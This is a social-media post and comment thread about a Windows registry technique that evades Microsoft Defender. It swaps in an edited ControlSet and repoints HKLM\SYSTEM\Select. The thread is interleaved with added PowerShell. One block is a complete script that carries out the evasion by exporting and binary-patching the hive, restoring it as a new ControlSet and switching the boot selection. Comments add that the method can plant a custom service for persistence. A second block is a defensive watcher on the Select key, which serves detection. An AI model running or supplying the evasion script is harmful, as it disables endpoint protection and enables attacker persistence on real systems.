Fancy Defender evasion? Yet another method, nearly bare hands:
1. Export CurrentControlSet to a file
2. Edit path in a file
3. Import a file as new ControlSet
4. Change "Select" values to new one
5. Reboot
6. Enjoy 😎
A side effect of my "Registry internals" session yesterday 😅

74,059 views • 2 years ago • via X (Twitter)
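The five steps of the post, as an added PowerShell rendering that is not Grzegorz Tworek's own code. It drives reg.exe (a thin wrapper over RegSaveKey/RegRestoreKey, hence the admin requirement discussed in the comments), patches the saved hive in place, and points `HKLM\SYSTEM\Select` at the copy. The two path strings, the temp file location and the choice of the next unused ControlSet number are assumptions; the post does not say which path it edits. The one caveat the binary edit needs is shown in `Edit-HiveString`: value data sits in fixed-size hive cells, so the replacement may be shorter (NUL-padded) but never longer, and it must match the stored UTF-16LE bytes exactly.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the original post. $OldPath, $NewPath and $HiveFile
# are assumed placeholders; the script does NOT reboot, that step is left to you.
param(
    [string]$OldPath  = 'C:\Placeholder\Old\service.exe',   # assumed: bytes of the ImagePath to rewrite
    [string]$NewPath  = 'C:\Placeholder\New\svc.exe',       # assumed: may not be longer than $OldPath
    [string]$HiveFile = (Join-Path $env:TEMP 'controlset.hiv')
)
$ErrorActionPreference = 'Stop'

function Edit-HiveString {
    # Overwrite every UTF-16LE occurrence of $Old inside the raw hive bytes with $New.
    # Cells are fixed-size: a shorter string is NUL-padded (REG_SZ stops at the first
    # NUL), a longer one is refused. Modifies $Bytes in place, returns the hit count.
    param([byte[]]$Bytes, [string]$Old, [string]$New)
    $utf16  = [System.Text.Encoding]::Unicode
    $latin1 = [System.Text.Encoding]::GetEncoding('ISO-8859-1')   # 1 byte <-> 1 char, fast search
    $oldB = $utf16.GetBytes($Old)
    $newB = $utf16.GetBytes($New)
    if ($newB.Length -gt $oldB.Length) { throw 'new path is longer than the one it replaces' }
    [byte[]]$patch = $newB + [byte[]]::new($oldB.Length - $newB.Length)
    $hay    = $latin1.GetString($Bytes)
    $needle = $latin1.GetString($oldB)
    $hits = 0
    $pos  = $hay.IndexOf($needle, [System.StringComparison]::Ordinal)
    while ($pos -ge 0) {
        [Array]::Copy($patch, 0, $Bytes, $pos, $patch.Length)
        $hits++
        $pos = $hay.IndexOf($needle, $pos + $needle.Length, [System.StringComparison]::Ordinal)
    }
    return $hits
}

# Step 1: export the ControlSet actually in use (Select\Current names it; CurrentControlSet is a link).
$sel    = Get-ItemProperty -Path 'HKLM:\SYSTEM\Select'
$srcSet = 'ControlSet{0:D3}' -f $sel.Current
# Assumption: the copy goes to the next unused ControlSet number.
$used   = Get-ChildItem -Path 'HKLM:\SYSTEM' |
          Where-Object { $_.PSChildName -match '^ControlSet\d{3}$' } |
          ForEach-Object { [int]($_.PSChildName -replace '^ControlSet', '') }
$newNum = ([int]($used | Measure-Object -Maximum).Maximum) + 1
$dstSet = 'ControlSet{0:D3}' -f $newNum
& reg.exe save "HKLM\SYSTEM\$srcSet" $HiveFile /y | Out-Null
if ($LASTEXITCODE -ne 0) { throw "reg save failed ($LASTEXITCODE)" }

# Step 2: patch the path inside the saved (binary) hive.
$bytes = [System.IO.File]::ReadAllBytes($HiveFile)
$hits  = Edit-HiveString -Bytes $bytes -Old $OldPath -New $NewPath
if ($hits -eq 0) { throw "'$OldPath' not found in $HiveFile (bytes must match the stored value exactly)" }
[System.IO.File]::WriteAllBytes($HiveFile, $bytes)

# Step 3: import the file as a new ControlSet (reg restore needs the target key to exist).
New-Item -Path "HKLM:\SYSTEM\$dstSet" -Force | Out-Null
& reg.exe restore "HKLM\SYSTEM\$dstSet" $HiveFile | Out-Null
if ($LASTEXITCODE -ne 0) { throw "reg restore failed ($LASTEXITCODE)" }

# Step 4: Select\Default is what boot-time selection reads to resolve CurrentControlSet;
# Current and LastKnownGood are updated by the system itself after the next successful boot.
Set-ItemProperty -Path 'HKLM:\SYSTEM\Select' -Name Default -Value $newNum -Type DWord
"$srcSet copied to $dstSet with $hits path string(s) rewritten; next boot uses $dstSet"
# Step 5: reboot when ready: Restart-Computer
```

Run it elevated; it stops at the first failing step and leaves the original ControlSet untouched, so the old set remains selectable from the boot menu as Last Known Good if the edited copy does not boot.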

11 comments

Grzegorz Tworek, 2 years ago

BTW if you think about responsible disclosure, the answer is quite simple: @msftsecresponse closes immediately reports related to Defender if you do not provide "Short explanation on how an attacker could use the information to exploit another user remotely".

imag0r, 2 years ago

You can get around pretty much all AVs this way. Addressing it would be super expensive performance wise. There’s really no good way to stop admins from doing nasty things.

Grzegorz Tworek, 2 years ago

One RegNotifyChangeKeyValue() watching the Select key.
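The detection suggested in the comment above, as an added example that is not part of the thread: a synchronous `RegNotifyChangeKeyValue()` watch on `HKLM\SYSTEM\Select` via P/Invoke. Every wake-up is reported with the four Select values, and a `Default` that no longer matches `Current` is flagged, since that is exactly what a pending switch to another ControlSet at the next boot looks like. The `$MaxEvents` parameter and the output format are this example's choices.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the thread. Watches HKLM\SYSTEM\Select with the
# synchronous form of RegNotifyChangeKeyValue() (advapi32) and reports each change.
Add-Type -Namespace Win32 -Name Advapi32 -MemberDefinition @'
[DllImport("advapi32.dll")]
public static extern int RegNotifyChangeKeyValue(
    IntPtr hKey, bool bWatchSubtree, int dwNotifyFilter, IntPtr hEvent, bool fAsynchronous);
'@
$REG_NOTIFY_CHANGE_NAME     = 0x1   # subkey added or deleted
$REG_NOTIFY_CHANGE_LAST_SET = 0x4   # a value was written

function Get-SelectState {
    # Snapshot of the values boot-time selection and LKG rely on.
    $p = Get-ItemProperty -Path 'HKLM:\SYSTEM\Select'
    [pscustomobject]@{
        Current = $p.Current; Default = $p.Default
        LastKnownGood = $p.LastKnownGood; Failed = $p.Failed
    }
}

function Test-SelectConsistent {
    # True when the next boot would keep using the ControlSet that is running now.
    param($State)
    return ($State.Default -eq $State.Current)
}

function Watch-SelectKey {
    param([int]$MaxEvents = [int]::MaxValue)   # assumed knob; default = watch forever
    $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey('SYSTEM\Select', $false)  # KEY_READ includes KEY_NOTIFY
    if ($null -eq $key) { throw 'cannot open HKLM\SYSTEM\Select' }
    $h = $key.Handle.DangerousGetHandle()
    $before = Get-SelectState
    for ($n = 0; $n -lt $MaxEvents; $n++) {
        # Synchronous call: blocks until one change happens, then must be re-armed.
        $rc = [Win32.Advapi32]::RegNotifyChangeKeyValue(
            $h, $true, ($REG_NOTIFY_CHANGE_NAME -bor $REG_NOTIFY_CHANGE_LAST_SET), [IntPtr]::Zero, $false)
        if ($rc -ne 0) { throw "RegNotifyChangeKeyValue failed: $rc" }
        $after = Get-SelectState
        "{0:u} Select changed: Current={1} Default={2} LKG={3} Failed={4} (was Default={5})" -f `
            (Get-Date), $after.Current, $after.Default, $after.LastKnownGood, $after.Failed, $before.Default
        if (-not (Test-SelectConsistent $after)) {
            Write-Warning ("next boot will resolve CurrentControlSet to ControlSet{0:D3} instead of ControlSet{1:D3}" -f `
                $after.Default, $after.Current)
        }
        $before = $after
    }
    $key.Dispose()
}

Watch-SelectKey
```

The watch only sees changes made while it runs, and it runs in the caller's context, so for production use the same call belongs in a service or sensor that starts early; the point of the comment is that the signal is a single key, not that a script is the right vehicle for it.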

Daniel Mielczarek, 2 years ago

Does that method work only on an admin account, or on a non-privileged one also?

Grzegorz Tworek, 2 years ago

Admin only, due to two reasons: 1. RegSaveKey() / RegRestoreKey() restrictions, 2. Permissions on HKLM\SYSTEM and HKLM\SYSTEM\Select

Advanced Persistent Dread, 2 years ago

@UK_Daniel_Card really cool!

Advanced Persistent Dread, 2 years ago

Could we run our own program instead? e.g. nsmpeng.exe? And would that have additional benefits?

Grzegorz Tworek, 2 years ago

Sure. You can add your own service after restoring the key. Or just edit paths in the binary file. Whatever is easier for you.

spencer, 2 years ago

Lol nice

Br3akp0int, 2 years ago

@Sug4r7 this is awesome! I also have similar research in this persistence topic and I'm planning to release it later this August, but I might release it soon because of this great research! 😊👍

Grzegorz Tworek, 2 years ago

@Sug4r7 And what about publishing your research in parts? :)